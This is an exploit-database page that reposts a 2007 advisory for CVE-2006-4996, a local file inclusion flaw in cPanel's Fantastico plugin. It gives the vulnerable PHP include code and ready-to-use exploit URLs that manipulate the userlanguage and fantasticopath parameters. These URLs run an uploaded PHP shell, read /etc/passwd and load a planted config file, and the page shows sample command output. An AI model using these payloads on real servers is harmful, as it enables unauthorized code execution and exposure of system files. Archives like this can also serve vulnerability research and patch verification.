Advertisement






Fantastico In all Version Cpanel 10.x <= local File Include

CVE Category Price Severity
CVE-2006-4996 CWE-98 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2007-03-21
CPE
cpe:cpe:/a:cpanel:all_versions
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2007030118

Below is a copy:

##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE

Vulnerable Code ( 1  ) :
  if(is_file($userlanguage))
    {
        include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php

Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?user
language=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?user
language=/etc/passwd

###################################################
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
{
include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First  Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php       D:

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantas
ticopath=/home/user/

###################################################

Discoverd By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.